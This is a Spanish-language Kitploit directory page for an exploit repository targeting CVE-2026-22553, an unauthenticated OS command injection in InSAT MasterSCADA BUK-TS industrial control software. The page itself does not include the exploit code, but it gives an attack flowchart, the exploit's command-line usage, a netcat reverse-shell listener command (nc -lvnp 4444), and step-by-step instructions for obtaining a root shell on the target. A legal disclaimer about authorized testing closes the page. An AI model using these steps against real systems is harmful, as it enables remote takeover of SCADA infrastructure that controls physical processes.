Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ | Kitploit
Herramientas/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Generación de PayloadsExplotaciónSeguridad SCADA/ICSExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 3 mesesAún no revisado

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - RCE sin autenticación

CVE-2026-22553 | CVSS 9.8 Crítico | Autor del exploit: Mohammed Idrees Banyamer


📝 Descripción

InSAT MasterSCADA BUK-TS sufre una vulnerabilidad de inyección de comandos del sistema operativo sin autenticación en la interfaz web MMadmServ. Esta falla permite a atacantes remotos lograr ejecución remota completa de código (RCE) sin necesidad de autenticación.

  • Producto afectado: InSAT MasterSCADA BUK-TS (Todas las versiones)
  • Tipo de vulnerabilidad: Inyección de comandos del sistema operativo (CWE-78)
  • Gravedad: Crítico (CVSS v3.1 Puntaje: 9.8)
  • Autor del exploit: Mohammed Idrees Banyamer
  • País: Jordania 🇯🇴

🛠️ Diagrama del método de ataque

root@kitploit:~
flowchart TD
    A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
    B -->|Unauthenticated| C[Vulnerable Parameter]
    C -->|OS Command Injection| D[Command Execution on Target Server]
    D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
    
    style A fill:#ff4d4d,stroke:#fff
    style E fill:#4dff88,stroke:#fff

🚀 Uso

root@kitploit:~
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>

Ejemplo

root@kitploit:~
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444

Opciones

OpciónDescripción
targetURL del objetivo (p. ej. http://ip:puerto)
--lhostSu dirección IP (shell inversa)
--lportSu puerto de escucha

📌 Cómo usar

  1. Inicie un listener en su máquina:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Ejecute el exploit:

    root@kitploit:~
    python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
    
  3. Obtenga una shell inversa con privilegios de root/sistema.


⚠️ Aviso legal

Este exploit se proporciona solo con fines educativos y de pruebas de penetración autorizadas.
El uso no autorizado contra sistemas que no le pertenecen es ilegal y puede violar leyes internacionales.
El autor no es responsable de ningún uso indebido.


📬 Autor

Mohammed Idrees Banyamer

  • Instagram: @banyamer_security
  • GitHub: mbanyamer
  • País: Jordania 🇯🇴

¡Dale una estrella ⭐ a este repositorio si te resultó útil!

Descargar herramienta